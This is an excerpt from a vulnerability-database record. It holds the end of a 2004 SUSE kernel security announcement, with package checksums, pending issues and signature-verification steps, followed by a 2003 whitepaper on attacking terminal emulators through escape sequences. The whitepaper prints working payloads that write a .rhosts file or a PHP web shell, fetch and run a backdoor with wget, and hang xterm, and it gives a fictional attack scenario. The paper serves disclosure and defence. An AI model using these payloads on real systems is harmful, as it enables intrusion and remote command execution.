ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/kernel-source-2.4.21-226.src.rpm\r\n 58c40a206f6f615daa3486fc6d6ade38\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_deflt-2.4.21-226.src.rpm\r\n 1c234f6c0475680b41c644c575ff8ef6\r\n ftp://ftp.suse.com/pub/suse/x86_64/update/9.0/rpm/src/k_smp-2.4.21-226.src.rpm\r\n e9b90824615859405b1979793662bc0d\r\n\r\n______________________________________________________________________________\r\n\r\n2) Pending vulnerabilities in SUSE Distributions and Workarounds:\r\n\r\n - icecast\r\n The icecast service is vulnerable to a remote denial-of-service\r\n attack. Update packages will be available soon.\r\n\r\n - sitecopy\r\n The sitecopy package includes a vulnerable version of the\r\n neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\r\n available soon.\r\n\r\n - cadaver\r\n The cadaver package includes a vulnerable version of the\r\n neon library (CAN-2004-0179, CAN-2004-0398). Update packages will be\r\n available soon.\r\n\r\n - OpenOffice_org\r\n The OpenOffice_org package includes a vulnerable version\r\n of the neon library (CAN-2004-0179, CAN-2004-0398). Update packages\r\n will be available soon.\r\n\r\n - tripwire\r\n A format string bug in tripwire can be exploited locally\r\n to gain root permissions. Update packages will be available soon.\r\n\r\n - postgresql\r\n A buffer overflow in psqlODBC could be exploited to crash the\r\n application using it. E.g. a PHP script that uses ODBC to access a\r\n PostgreSQL database can be utilized to crash the surrounding Apache\r\n web-server. Other parts of PostgreSQL are not affected.\r\n Update packages will be available soon.\r\n\r\n - lha\r\n Minor security fix for a buffer overflow while handling command\r\n line options. This buffer overflow could be exploited in conjunction\r\n with other mechanisms to gain higher privileges or access the system\r\n remotely.\r\n\r\n - XDM/XFree86\r\n This update resolves random listening to ports by XDM\r\n that allows to connect via the XDMCP. SUSE LINUX 9.1\r\n is affected only.\r\n New packages are currently being tested and will be\r\n available soon.\r\n\r\n - mod_proxy\r\n A buffer overflow can be triggered by malicious remote\r\n servers that return a negative Content-Length value.\r\n This vulnerability can be used to execute commands remotely\r\n New packages are currently being tested and will be\r\n available soon.\r\n\r\n______________________________________________________________________________\r\n\r\n3) standard appendix: authenticity verification, additional information\r\n\r\n - Package authenticity verification:\r\n\r\n SUSE update packages are available on many mirror ftp servers around\r\n the world. While this service is considered valuable and important\r\n to the free and open source software community, many users wish to be\r\n certain as to be the origin of the package and its content before\r\n installing the package. There are two independent verification methods\r\n that can be used to prove the authenticity of a downloaded file or\r\n rpm package:\r\n 1) md5sums as provided in the (cryptographically signed) announcement.\r\n 2) using the internal gpg signatures of the rpm package.\r\n\r\n 1) execute the command\r\n md5sum <name-of-the-file.rpm>\r\n after you have downloaded the file from a SUSE ftp server or its\r\n mirrors. Then, compare the resulting md5sum with the one that is\r\n listed in the announcement. Since the announcement containing the\r\n checksums is cryptographically signed (usually using the key\r\n security@suse.de), the checksums offer proof of the authenticity\r\n of the package.\r\n We recommend against subscribing to security lists which cause the\r\n email message containing the announcement to be modified so that\r\n the signature does not match after transport through the mailing\r\n list software.\r\n Downsides: You must be able to verify the authenticity of the\r\n announcement in the first place. If RPM packages are being rebuilt\r\n and a new version of a package is published on the ftp server, all\r\n md5 sums for the files are useless.\r\n\r\n 2) rpm package signatures provide an easy way to verify the authenticity\r\n of an rpm package. Use the command\r\n rpm -v --checksig <file.rpm>\r\n to verify the signature of the package, where <file.rpm> is the\r\n filename of the rpm package that you have downloaded. Of course,\r\n package authenticity verification can only target an un-installed rpm\r\n package file.\r\n Prerequisites:\r\n a) gpg is installed\r\n b) The package is signed using a certain key. The public part of this\r\n key must be installed by the gpg program in the directory\r\n ~/.gnupg/ under the user's home directory who performs the\r\n signature verification (usually root). You can import the key\r\n that is used by SUSE in rpm packages for SUSE Linux by saving\r\n this announcement to a file ("announcement.txt") and\r\n running the command (do "su -" to be root):\r\n gpg --batch; gpg < announcement.txt | gpg --import\r\n SUSE Linux distributions version 7.1 and thereafter install the\r\n key "build@suse.de" upon installation or upgrade, provided that\r\n the package gpg is installed. The file containing the public key\r\n is placed at the top-level directory of the first CD (pubring.gpg)\r\n and at ftp://ftp.suse.com/pub/suse/pubring.gpg-build.suse.de .\r\n\r\n\r\n - SUSE runs two security mailing lists to which any interested party may\r\n subscribe:\r\n\r\n suse-security@suse.com\r\n - general/linux/SUSE security discussion.\r\n All SUSE security announcements are sent to this list.\r\n To subscribe, send an email to\r\n <suse-security-subscribe@suse.com>.\r\n\r\n suse-security-announce@suse.com\r\n - SUSE's announce-only mailing list.\r\n Only SUSE's security announcements are sent to this list.\r\n To subscribe, send an email to\r\n <suse-security-announce-subscribe@suse.com>.\r\n\r\n For general information or the frequently asked questions (faq)\r\n send mail to:\r\n <suse-security-info@suse.com> or\r\n <suse-security-faq@suse.com> respectively.\r\n\r\n =====================================================================\r\n SUSE's security contact is <security@suse.com> or <security@suse.de>.\r\n The <security@suse.de> public key is listed below.\r\n =====================================================================\r\n______________________________________________________________________________\r\n\r\n The information in this advisory may be distributed or reproduced,\r\n provided that the advisory is not modified in any way. In particular,\r\n it is desired that the clear-text signature must show proof of the\r\n authenticity of the text.\r\n SUSE Linux AG makes no warranties of any kind whatsoever with respect\r\n to the information contained in this security advisory.\r\n\r\nType Bits/KeyID Date User ID\r\npub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security@suse.de>\r\npub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build@suse.de>\r\n\r\n- -----BEGIN PGP PUBLIC KEY BLOCK-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see http://www.gnupg.org\r\n\r\n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\r\nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE=\r\n=LRKC\r\n- -----END PGP PUBLIC KEY BLOCK-----\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.2 (GNU/Linux)\r\n\r\niQEVAwUBQNBTgney5gA9JdPZAQHB7Af/XRy01sYB1rDi0L+TwlQtW4nr4vwrJTOt\r\n6pA/M+oNsW0SUPK3kCcN+v7mvuIrA69c1VZeYgfI4/dy0bdMntcVkOliikn0+m0i\r\ne2SvKYY+/KC8wZaUIrKFbH4PA0Gdf40GmNVj4uq5KdwohJLGQDTa8eguiYocMjXv\r\nE8QAdGTaPXEBGz8Ode6YMYAbauHbWXip9x6TyQ7NgiQ4mylabmmw8AUebVyM4oWS\r\na28uoT8nWPu+BwYNW0zt26clPhLvmHWFpIpqyaWERaWMuCrFHwlc753B2PCOVdnm\r\nYj/ugqlkkGRysclITz3WFbUGUKtd91AdZAEK6l+MxkuqRDZmNUYgHw==\r\n=q9W1\r\n-----END PGP SIGNATURE-----", "modified": "2004-06-18T00:00:00", "published": "2004-06-18T00:00:00", "id": "SECURITYVULNS:DOC:6363", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:6363", "title": "SUSE Security Announcement: kernel (SuSE-SA:2004:017)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:07", "bulletinFamily": "software", "description": "TERMINAL EMULATOR SECURITY ISSUES\r\nCopyright \u00a9 2003 Digital Defense Incorporated\r\nAll Rights Reserved\r\n\r\n\r\n\r\n[ Table of Contents ]\r\n\r\n-- Summary \r\n-- Disclaimer \r\n-- Escape Sequences \r\n-- Remote Exploitation \r\n-- Screen Dumping \r\n-- Window Title Reporting\r\n-- Miscellaneous Issues \r\n-- Terminal Defense\r\n-- Tested Emulator Versions\r\n-- Vulnerability Index\r\n-- A Fictitious Case Study\r\n-- References\r\n-- Credits\r\n\r\n\r\n[ Summary ]\r\n\r\nMany of the features supported by popular terminal emulator software can be abused \r\nwhen un-trusted data is displayed on the screen. The impact of this abuse can range from \r\nannoying screen garbage to a complete system compromise. All of the issues below are \r\nactually documented features, anyone who takes the time to read over the man pages or \r\nsource code could use them to carry out an attack. \r\n\r\n\r\n\r\n[ Disclaimer ]\r\n\r\nThere is nothing new in this paper. The entire concept of exploiting a terminal by \r\nsupplying hostile input has been around for over 10 years now. Unix veterans and BBS \r\nusers have been exposed to this type of problem since the very beginning, a newsgroup \r\nsearch can turn up all sorts of exploits, from the ever-popular "flash" program to the \r\nabuse of logging features in xterm which were disabled in R5. Therefore the purpose of \r\nthis paper is to identify weaknesses in the current suite of popular terminal emulation \r\nsoftware, not to rehash an ancient problem.\r\n\r\n\r\n\r\n[ Escape Sequences ]\r\n\r\nTypically, an escape sequence is a series of characters starting with the ASCII escape \r\ncharacter (0x1B) and followed by a specific set of arguments. Escape sequences were \r\noriginally used to control display devices such as dumb terminals and have been extended\r\nto allow various forms of interaction with modern operating systems. An escape sequence \r\nmight be used to change text attributes (color, weight), move the cursor position, \r\nreconfigure the keyboard, update the window title, or manipulate the printer. Over the \r\nyears, many new features have been added that required enhancements to the terminal \r\nemulator applications to support them. \r\n\r\n\r\n\r\n[ Remote Exploitation ]\r\n\r\nTo exploit an escape sequence feature, an attacker must be able to display arbitrary data \r\nto the victim's terminal emulator. While at first glance that may seem rather unlikely, the \r\nattacker can take advantage of a number of small bugs in other applications to increase \r\ntheir chance of success.\r\n\r\nJust about every network service that uses syslog will pass remote data directly to the \r\ndaemon without filtering the escape character. The responsibility then lays on the syslog \r\ndaemon to strip the escape code before writing the log entry to the disk or terminal. \r\nAlthough both the stock *BSD syslog daemons as well the sysklogd package filter escape \r\nsequences, msyslog, syslog-ng, and the logging daemons supplied with many commercial \r\nUNIX-based operating systems do not.\r\n\r\nWhile sending data directly to a vulnerable syslogd or rwalld service is the most direct \r\nform of attack, there are literally dozens of other ways to place hostile binary data onto\r\nthe terminal of a remote user. The Apache web server makes an effort to clean garbage \r\nfrom its access logs, but it still allows escape characters to be injected into the error logs.\r\nMany command-line network tools can be exploited by a hostile service response, some \r\nexamples of this is include wget, curl, ftp, and telnet. \r\n\r\nMulti-user systems are especially vulnerable, as any user can send a system-wide \r\nmessage under the default configuration of most operating systems. Placing the attack \r\ndata into the banner of a popular FTP server, telnet service, or message of the day file \r\nwill increase the chance of finding a valid target. Certain console email clients refuse to \r\ndisplay files when the content-type of an attachment is set to a unrecognized value, so the \r\nuser must save the file and then read it on the command line, often just using the standard \r\n"cat" utility. \r\n\r\n\r\n\r\n[ Screen Dumping ]\r\n \r\nEterm and rxvt both implement what they call the "screen dump" feature. This escape \r\nsequence will cause an arbitrary file to be opened and filled with the current contents of \r\nthe terminal window. These are the only two tested emulators[1] that still had the ability \r\nto write to files enabled by default. Although rxvt will ignore dump requests for existing \r\nfiles, Eterm[2] will happily delete the file and then create it again. Although it is \r\ntechnically the same feature, the OSC code used to trigger it is different between the two \r\nemulators. For rxvt, the screen dump code is 55, for Eterm, it is 30. It is possible to \r\ncontrol the entire contents of the file by specifying the reset sequence, then the required \r\ndata, followed by the screen dump command. \r\n\r\n$ echo -e "\ec+ +\n\e]<Code>;/home/user/.rhosts\a"\r\n\r\nThe same approach can be used to create an authorized_keys file for SSH, a replacement \r\npasswd file, or even a hostile PHP script written to the user's web directory. This attack \r\nrequires no interaction on the part of the user and would be very difficult to detect if done \r\ncorrectly. The primary difference between this issue and some of the others mentioned in \r\nthis paper is that the actual "exploitation" happens on the system running the emulator \r\nsoftware, not the current system that the terminal is accessing. The code that is \r\nresponsible for opening the dump file is shown below. \r\n\r\n/* rxvt */ \r\nif ((fd = open(str, O_RDWR | O_CREAT | O_EXCL, 0600)) >= 0) \r\n\r\n/* Eterm */ \r\nunlink(fname);\r\noutfd = open(fname, O_CREAT | O_EXCL | O_NDELAY | O_WRONLY, S_IRUSR | S_IWUSR);\r\n\r\n[1] XFree86's xterm disabled an equivalent feature in X11R5 due to security concerns. It \r\n can still be enabled with a compile-time option.\r\n\r\n[2] Eterm actually disabled this in 0.9.2 (October 31, 2002), however many recent Linux \r\n distributions still shipped with 0.9.1.\r\n\r\n\r\n\r\n[ Window Title Reporting ]\r\n\r\nOne of the features which most terminal emulators support is the ability for the shell to \r\nset the title of the window using an escape sequence. This feature was originally \r\nimplemented by DEC for DECterm and has since been added to most emulators in use \r\ntoday. The easy way to set the window title of a terminal is using the echo command:\r\n\r\n$ echo -e "\e]2;This is the new window title\a"\r\n\r\nWhen the output of the above command is displayed on the terminal, it will set the \r\nwindow title to that string. Setting the window title by itself is not much of a security \r\nissue, however certain xterm variants (and dtterm) also provide an escape sequence for \r\nreporting the current window title. This essentially takes the current title and places it \r\ndirectly on the command line. Due to the way that most emulators processes the escape \r\nsequence, it is not possible to embed a carriage return into the window title itself, so the \r\nuser would need to hit enter for it to process the title as a command. The escape sequence \r\nfor reporting the window title is:\r\n\r\n$ echo -e "\e[21t"\r\n\r\nAt this point, the attacker needs to convince the user to hit enter for the "exploit" to \r\nsucceed. There are a number of techniques available to both hide the command and \r\nencourage the user to "press enter to continue". The simplest is to just insert a prompt \r\nfollowed by the "invisible" character attribute right before reporting the title. Another \r\nmethod is to set the foreground and background colors to be the same (all black or white) \r\nand hope the user hits the enter key when trying to determine what happened. The \r\nfollowing example for xterm demonstrates a sequence that downloads and executes a \r\nbackdoor while hiding the command line. The "Press Enter >" string should be changed \r\nto something appropriate for the attack vector. Some likely candidates include "wget \r\ninternal error: press enter to continue" or "Error: unknown TERM, hit enter to continue".\r\n\r\n$ echo -e "\e]2;;wget 127.0.0.1/.bd;sh .bd;exit;\a\e[21t\e]2;xterm\aPress Enter>\e[8m;"\r\n\r\nAny terminal emulator that allows the window title to be placed on the command-line is \r\nvulnerable to this attack. The applications which were confirmed vulnerable include \r\nxterm, dtterm, uxterm, rxvt, aterm, Eterm, hanterm, and putty[1]. The tested applications \r\nthat did not allow the title to be written include gnome-terminal 2.0, konsole, SecureCRT,\r\nand aterm.\r\n\r\n[1] Although putty would place the title onto the command-line, we were not able to find \r\na method of hiding the command, since neither the "invisible" character attribute nor the \r\nforeground color could be set. Putty has a relatively low limit to the number of characters \r\nthat can be placed into the window title, so it is not possible to simply flood the screen \r\nwith garbage and hope the command rolls past the current view.\r\n\r\n\r\n\r\n[ Miscellaneous Issues ]\r\n\r\nEterm should be given an award for the "Easiest to Compromise" terminal emulator. The \r\ndevelopers based much of their code off of the rxvt and xterm source, so Eterm tends to \r\nshare the same problems as those two emulators as well. If you happen to be running a \r\nCVS version of Eterm from between February 10th and May 8th of 2001, it was possible \r\nto execute an arbitrary command just by displaying the following escape sequence: \r\n\r\n$ echo -e "\e]6;73;command\a"\r\n \r\nFortunately, this feature never made it into an official release, the "fork-and-exec" ability \r\nwas replaced by the script action spawn() instead. \r\n\r\nDuring the research process, a number of small bugs were found that would either lock \r\nup the emulator completely or crash it. Although they can be disregarded as simple denial \r\nof service attacks, they could be abused to prevent an administrator from seeing \r\nsubsequent logs during a compromise. In general, the code which processed application-\r\nside input seemed to place little emphasis on sanitizing the data before passing it directly \r\nto system-level functions. While there was some effort made to avoid standard buffer \r\noverflows, much of the loop-based character processing appeared ripe for a denial of \r\nservice attack. An example of this is a bug in the DEC UDK processing of XFree86's \r\nxterm application, the following command will place the process into a tight resource-\r\neating loop:\r\n\r\n$ echo -e "\eP0;0|0A/17\x9c"\r\n\r\nThis bug was reported to xfree86@xfree86.org on December 17th, 2002 and no response \r\nwas received as of the publication of this writing. The hanterm application is also \r\nvulnerable to this issue, as the code base started off as a direct copy of xterm.\r\n\r\nBoth rxvt and aterm support a feature known as the menuBar. This feature allows the user \r\nto create drop-down menus at the top of the terminal screen using both menu \r\nconfiguration files and escape sequences. Anyone able to display data on the terminal \r\ncould modify the menu entries in a way that would compromise the system when \r\naccessed. This type of attack relies more on social engineering, but still provides a \r\npotential entry point when nothing else is available. The example below will create a new \r\ntop-level menu item called "Special" with a single item labeled "Access", when clicked it \r\nwill download and execute a backdoor from http://127.0.0.1/.bd and exit the shell.\r\n\r\n$ echo -e "\e]10;[:/Special/{Access} wget 127.0.0.1/.bd\rsh bd\rexit\r:]\a\e]10;[show]\a"\r\n\r\n\r\n\r\n[ Terminal Defense ]\r\n\r\nThe ideal solution is to sanitize all data before displaying it on your terminal, however \r\nwithout a custom terminal application or data filter, you can't guarantee that every tool \r\nyou use on the command-line is going to strip escape sequences. The responsibility \r\nshould rest on the actual terminal emulator; any features that allow file or command-line \r\naccess should be disabled by default and more attention should be paid to new features \r\nthat implement any use of escape sequences.\r\n\r\nThe tested terminal emulators that were not susceptible to the screen dump or window \r\ntitle attacks include KDE's konsole, Gnome's gnome-terminal, Vandyke's SecureCRT, \r\nand Sasha Vasko's aterm. Konsole and gnome-terminal each use their own independent \r\ncode-base and didn't try to support the same massive feature set as the others. \r\nSecureCRT took a similar approach, emulating just the minimum needed to be usable. \r\nWith aterm, the code was originally based on rxvt, however many of the dangerous \r\nfeatures were removed as the project progressed.\r\n\r\n\r\n\r\n[ Test Emulator Versions ]\r\n\r\nxterm: xf86 4.2.0 (patch 165)\r\naterm: 0.42\r\nrxvt: 2.7.8\r\nEterm: 0.9.1\r\nkonsole: 3.1.0 rc5\r\nputty: 0.53\r\nSecureCRT: 3.4.6\r\ngnome-terminal: 2.0.2 (libzvt 2.0.1) [2.2 indirectly]\r\nhanterm-xf: 2.0\r\n\r\n\r\n\r\n[ Vulnerability Index ]\r\n\r\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned CVE \r\ncandidate namess for all issues described in this paper. \r\n\r\nCAN-2003-0020 Apache Error Log Escape Sequence Injection\r\n\r\nCAN-2003-0021 Screen Dump: Eterm \r\nCAN-2003-0022 Screen Dump: rxvt\r\n\r\nCAN-2003-0063 Window Title Reporting: xterm \r\nCAN-2003-0064 Window Title Reporting: dtterm\r\nCAN-2003-0065 Window Title Reporting: uxterm\r\nCAN-2003-0066 Window Title Reporting: rxvt\r\nCAN-2003-0067 Window Title Reporting: aterm\r\nCAN-2003-0068 Window Title Reporting: eterm\r\nCAN-2003-0069 Window Title Reporting: putty\r\nCAN-2003-0070 Window Title Reporting: gnome-terminal\r\nCAN-2003-0078 Window Title Reporting: hanterm-xf\r\n\r\nCAN-2003-0071 DEC UDK Processing DoS: xterm\r\nCAN-2003-0079 DEC UDK Processing DoS: hanterm-xf\r\n\r\nCAN-2003-0023 Menubar Manipulation: rxvt\r\nCAN-2003-0024 Menubar Manipulation: aterm\r\n\r\n\r\n\r\n[ A Fictitious Case Study ]\r\n\r\nJim is the sole administrator for the web server farm at a moderately sized ISP. Most of \r\nhis company's clients maintain their own sites and Jim's primary responsibility is to keep \r\nthe web servers online and secured. Jim spends some of his spare time dabbling with \r\nPHP and uses his workstation as his development system. The workstation is on the same \r\nnetwork segment as the rest of the servers and the firewall only allows TCP port 80 and \r\n443 inbound. Jim has a new 2.5Ghz P4 and finally has enough processing power to run \r\nthe Enlightenment window manager with all the tweaks. His favorite part about \r\nEnlightenment is the terminal emulator, Eterm, which lets him make the background \r\ntransparent and do all sorts of imaging tricks. Jim keeps a tail process running for the \r\nerror_log files on each server he manages, allowing him to easily spot script bugs and \r\nmisconfigurations before the customer calls him to fix it. \r\n\r\nAndre is pissed. Some "friends" from his old hacking group have posted some \r\nembarrassing photos of him on the group's home page. The page is hosted in the ~user \r\ndirectory on a web server at some dinky ISP his old friend uses. He starts poking at the \r\nweb server only to give up about 30 minutes later after failing to find a single vulnerable \r\nCGI or outdated service. He starts up Nmap again, this time on the whole class C that the \r\nweb server resides in, determined to take down the entire subnet if he has to. He finds \r\nanother web server, this one is running a traceroute gateway that is vulnerable to meta-\r\ncharacter injection. Andre manages to get an outbound shell back to a bounce system and \r\nproceeds to poke around. He finds what appears to be an OpenSSH public key in the /tmp \r\ndirectory, named JimH.pub. Looking at the key file, he sees that the userid stored in it is \r\nfor jim@jimsbox.weeisp.com. A quick check shows that jimsbox.weeisp.com not only \r\nresolves to an external address, but is also running a web server. \r\n\r\nThe index page of Jim's web server consists of a couple pictures of him, some links to his \r\nfavorite news sites, some screenshots of his new super-leet desktop, and some of his \r\nlatest PHP projects. The first PHP project link Andre clicks on immediately starts \r\nspewing errors, complaining about not being able to connect to the database. The error \r\nmessage itself is interesting though, since it contains the full path to the script that \r\ntriggered the error. Andre makes a quick note of this and keeps digging around, hoping \r\nfor an easy entry point. As soon as he pulls up the desktop screen shots, he knows he \r\nstruck gold. The screen shot not only shows a scantily clad Italian model in the \r\nbackground, but an Eterm open tailing the logs of the same server his pictures are being \r\nserved from. He gets to work, hitting the workstation with every tool he can find, but an \r\nhour later he still hasn't busted a shell. While looking through the screen shots again, \r\nAndre gets the idea to look at the Eterm documentation and see what other features it \r\nsupports. Not only is the documentation easy to read with plenty of examples, but it \r\nmentions an interesting feature described as a "screen dump".\r\n\r\nAbout two hours later, Andre finally manages to get Eterm and its 60 megabytes of \r\nsupport libraries compiled. He discovers that to force Eterm to write out a file, all he has \r\nto do is display a certain sequence of characters to the screen. The question now is how to \r\nget those characters onto that Eterm at 4:30 in the morning. After a quick review of the \r\nApache source code, he finally finds a spot in the error handling code where he can inject \r\narbitrary data into the log files. All he has to do is send a request for a file with the escape\r\nsequence he wants to use and Apache will write the unfiltered data directly to the log file. \r\n\r\nNow that he can write arbitrary files to the workstation, he has to find a method of using \r\nit to gain access. Andre is pretty sure that the workstation is running SSH, but the only \r\nports available are 80 and 443. He remembers that the PHP errors he saw earlier provided \r\nthe full path to the web root, if he can write files there, then he run commands through the \r\nweb server. Five minutes later, Andre is connecting to the target web server and sending \r\na GET request for a string generated with the following command:\r\n\r\n$ echo -e "\ec<?passthru($c);?>\e]30;/home/www/htdocs/owned.php\a"\r\n\r\nThis command clears the current screen buffer, displays his hostile PHP code to the \r\nscreen, and then uses the screen dump command to write it into the web root. He points \r\nhis browser to http://jimsbox.weeisp.com/owned.php?c=id and starts the process of \r\nrooting Jim's workstation, stealing his SSH keys, and taking those horrid pictures (as well \r\nas the rest of the group's files) off of that web server.\r\n\r\n\r\n\r\n[ References ]\r\n\r\nThis Paper and Associated Tools\r\n--- http://www.digitaldefense.net/labs/whitepapers.html\r\n--- http://www.digitaldefense.net/labs/securitytools.html\r\n\r\nRecognized Escape Sequences\r\n--- Eterm: 